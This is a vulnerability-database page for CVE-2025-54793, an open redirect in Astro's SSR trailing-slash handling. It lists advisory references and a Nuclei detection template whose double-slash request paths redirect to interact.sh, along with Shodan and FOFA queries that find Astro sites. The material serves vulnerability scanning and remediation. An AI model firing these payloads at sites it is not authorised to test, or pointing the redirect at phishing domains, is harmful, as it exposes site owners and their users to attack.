| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2025-54793 | 11 Oct 202509:00 | – | circl | |
| Astro 输入验证错误漏洞 | 8 Aug 202500:00 | – | cnnvd | |
| CVE-2025-54793 | 8 Aug 202500:02 | – | cve | |
| CVE-2025-54793 Astro: Duplicate trailing slash feature can lead to Open Redirects | 8 Aug 202500:02 | – | cvelist | |
| EUVD-2025-23968 | 3 Oct 202520:07 | – | euvd | |
| Astros's duplicate trailing slash feature leads to an open redirection security issue | 7 Aug 202516:41 | – | github | |
| CVE-2025-54793 | 8 Aug 202501:15 | – | nvd | |
| CVE-2025-54793 Astro: Duplicate trailing slash feature can lead to Open Redirects | 8 Aug 202500:02 | – | osv | |
| GHSA-CQ8C-XV66-36GW Astros's duplicate trailing slash feature leads to an open redirection security issue | 7 Aug 202516:41 | – | osv | |
| PT-2025-32332 | 7 Aug 202500:00 | – | ptsecurity |
id: CVE-2025-54793
info:
name: Astro SSR - Open Redirect
author: DhiyaneshDk
severity: medium
description: |
Astro 5.2.0 through 5.12.7 contains an open redirect caused by improper handling of paths with double slashes in trailing slash redirection logic, letting attackers redirect users to arbitrary external domains, exploit requires on-demand SSR with Node or Cloudflare adapters.
impact: |
Attackers can redirect users to malicious sites, increasing phishing and social engineering risks.
remediation: |
Upgrade to version 5.12.8 or later; alternatively, block outgoing redirects with Location headers starting with // at the network level.
reference:
- https://github.com/withastro/astro/security/advisories/GHSA-cq8c-xv66-36gw
- https://nvd.nist.gov/vuln/detail/CVE-2025-54793
- https://github.com/withastro/astro/commit/9ec88a04f93611cc07deff76ef6a18c88d6a77b9
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2025-54793
epss-score: 0.00572
epss-percentile: 0.43193
cwe-id: CWE-601
metadata:
verified: true
max-request: 3
vendor: withastro
product: astro
shodan-query: http.component:"Astro"
fofa-query: app="Astro"
tags: cve,cve2025,astro,redirect,open-redirect
http:
- method: GET
path:
- "{{BaseURL}}//interact.sh/en//"
- "{{BaseURL}}//interact.sh/en/"
- "{{BaseURL}}//interact.sh/en"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 301
- 302
- 307
- 308
- type: regex
part: header
regex:
- '(?i)location:\s*//interact\.sh'
# digest: 490a0046304402205e5a664aca96ecd0e7d325ee70e60c75a4ff7773042cb245dcd5e7eb62960e0102203238e983115bfea9ecfff1323b4557050ac0757b7ccbf95de659a48a6d1c0d48:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation